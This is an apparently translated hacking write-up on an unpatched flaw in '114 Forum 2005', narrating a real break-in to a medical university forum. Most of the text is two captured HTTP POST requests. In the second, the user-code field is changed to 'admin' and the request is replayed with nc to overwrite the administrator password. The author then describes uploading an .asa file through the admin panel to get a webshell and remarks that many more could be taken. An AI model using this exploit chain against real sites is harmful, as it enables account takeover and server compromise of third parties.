SoFunction
Updated on 2025-04-09

114 Forum 2005 official version loophole

Keywords:
"Copyright Design and Production: Website 114"
Vulnerability description:
Website 114 Forum 2005 version official
/
Lack of verification of submitted data and cooikes
As a result any user can modify the administrator password
Default background admin/
I used it today when I was noting a machine in a computer room.
http://www.***./xzl/BBS/
**A forum on the Medical University website.
Registered a user 33221.
Then jump to / and click "Modify Registration" to start catching the package!
Use notepad to save the packet capture content as follows:
-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/-excel, application/-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***./xzl/BBS//
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
gentlemen
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
Modify registration information
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------
in:"
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6

Modify the first "33221" to "admin" to save the text as:

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/-excel, application/-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***./xzl/BBS//
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
gentlemen
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
Modify registration information
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--
Here, because the username 33221 I registered is the same as the admin length, there is no need to modify the byte length here.
Then submit to the server using nc
nc www.***. 80 <
Return to prompt that the member information is modified successfully.
Then use the admin password to log in as the password for application 33221.
Of course, it is the administrator permissions, then log in to the background, click "Modify column", upload the asa *, ok, and get the webshll.
After looking at it, there is no patch yet. You can get a large number of webshells, but I only need a server that is more useful to me, and I haven't caught anything else.